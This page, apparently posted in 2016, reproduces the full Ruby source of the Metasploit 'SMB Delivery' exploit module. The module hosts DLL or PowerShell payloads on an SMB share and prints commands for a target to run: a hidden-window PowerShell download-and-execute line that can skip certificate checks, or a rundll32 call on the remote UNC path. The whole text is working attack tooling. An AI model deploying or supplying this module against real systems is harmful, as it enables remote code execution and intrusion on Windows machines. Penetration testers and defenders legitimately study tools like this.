SMB Delivery Module
Posted on 06 August 2016
require 'msf/core' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => "SMB Delivery", 'Description' => %q{ This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith', 'Russel Van Tuyl' ], 'References' => [ ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ ['DLL', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }], ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }] ], 'Privileged' => false, 'DisclosureDate' => "Jul 26 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll']) ], self.class) deregister_options('FILE_CONTENTS') end def primer print_status('Run the following command on the target machine:') case target.name when 'PSH' self.file_contents = cmd_psh_payload( payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: download_and_run) when 'DLL' self.file_contents = generate_payload_dll print_line("rundll32.exe #{unc},0") end end end